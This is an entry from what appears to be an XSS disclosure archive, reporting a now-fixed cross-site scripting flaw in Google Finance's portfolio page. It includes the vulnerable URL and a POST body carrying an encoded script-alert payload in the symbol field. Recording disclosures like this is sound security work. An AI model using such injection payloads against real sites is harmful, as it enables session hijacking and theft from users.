Home | News | Articles | Adv. | Submit | Alerts | Links | XSS info | About | Contact

XSS Archive | XSS Archive | TOP Submitters | TOP Submitters | TOP Pagerank |

Date submitted: 03/12/2007 Date published: 03/12/2007 Date fixed: 12/11/2008 Status:  FIXED Author: Fugitif Domain: finance.google.com Category: XSS Pagerank: 2 URL: http://finance.google.com/finance/portfolio?action=add&hash=0bdb25b244bb4501 POST: pid=1&editmode=basic&add_symbols_1=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&add_ttype_1=BUY& add_date_1=&add_shares_1=&add_price_1=&add_commission_1=&add_notes_1= Additional information: Requires authentication, and requires the attacker to guess or retrieve the 'hash' parameter, or to force the user into inserting malicious data into the 'Symbol' input box

Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.